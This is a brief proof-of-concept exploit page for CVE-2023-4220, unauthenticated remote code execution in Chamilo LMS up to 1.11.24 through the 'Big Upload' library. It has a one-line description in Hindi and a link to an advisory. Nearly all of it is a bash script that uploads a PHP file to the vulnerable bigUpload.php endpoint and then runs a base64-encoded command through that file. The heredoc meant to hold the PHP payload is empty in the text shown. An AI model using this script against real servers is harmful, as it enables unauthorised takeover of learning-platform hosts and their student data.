
RCE Chamilo 1.11.24
################################# CVE-2023-4220 RCE Chamilo 1.11.24
| https://starlabs.sg/advisories/23/23-4220/ | | Chamilo LMS <= 1.11.24 (Beersel 31/08/2023) | बिना प्रमाणीकरण के फ़ाइल के माध्यम से दूरस्थ कोड निष्पादन "Big Upload" लाइब्रेरी पर | | संस्करण पहचानें : /documentation/changelog.html | | POC EXPLOIT CVE RCE VULN
.. code-block:: bash
#!/bin/bash HOST='http://lms.domain.com' CMD='id'
URL_UPLD='main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported' URL_FILE='main/inc/lib/javascript/bigupload/files/rce.php'
cat <<'EOF'>/tmp/rce.php
EOF
curl -F 'bigUploadFile=@/tmp/rce.php' "$HOST/$URL_UPLD" CMD=$(echo $CMD|base64 -w0| python3 -c "import urllib.parse,sys; print(urllib.parse.quote_plus(sys.stdin.read()))") curl "$HOST/$URL_FILE?aoOoy=$CMD"